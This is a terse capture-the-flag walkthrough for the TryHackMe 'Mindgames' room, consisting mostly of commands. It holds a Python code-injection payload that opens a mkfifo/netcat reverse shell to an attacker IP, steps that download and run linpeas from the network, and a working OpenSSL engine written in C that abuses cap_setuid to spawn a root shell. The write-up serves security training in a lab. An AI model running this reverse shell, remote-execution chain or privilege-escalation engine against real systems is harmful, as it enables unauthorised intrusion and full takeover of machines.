Mindgames
Room Link: https://tryhackme.com/room/mindgames
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Nothing really found, the pages listed are all broken links
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
https://www.dcode.fr/brainfuck-language
Encode
__import__("os").system("ls -la")
Kali
nc -lvnp 4242Encode
__import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.231.107 4242 >/tmp/f")
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgLinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81Victim
cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh
./linpeas.shPrivilege Escalation
Exploit: https://chaudhary1337.github.io/p/how-to-openssl-cap_setuid-ep-privesc-exploit/
We found openssl has cap_setuid+ep in Linpeas
We can also run the below command to validate
Victim
getcap -r / 2>/dev/null
openssl-exploit-engine.c
#include <openssl/engine.h>
static int bind(ENGINE *e, const char *id)
{
setuid(0); setgid(0);
system("/bin/bash");
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN() Kali
gcc -fPIC -o openssl-exploit-engine.o -c openssl-exploit-engine.c
gcc -shared -o openssl-exploit-engine.so -lcrypto openssl-exploit-engine.o
python2 -m SimpleHTTPServer 81Victim
cd /tmp/
wget http://$KALI:81/openssl-exploit-engine.so
openssl req -engine ./openssl-exploit-engine.so
Last updated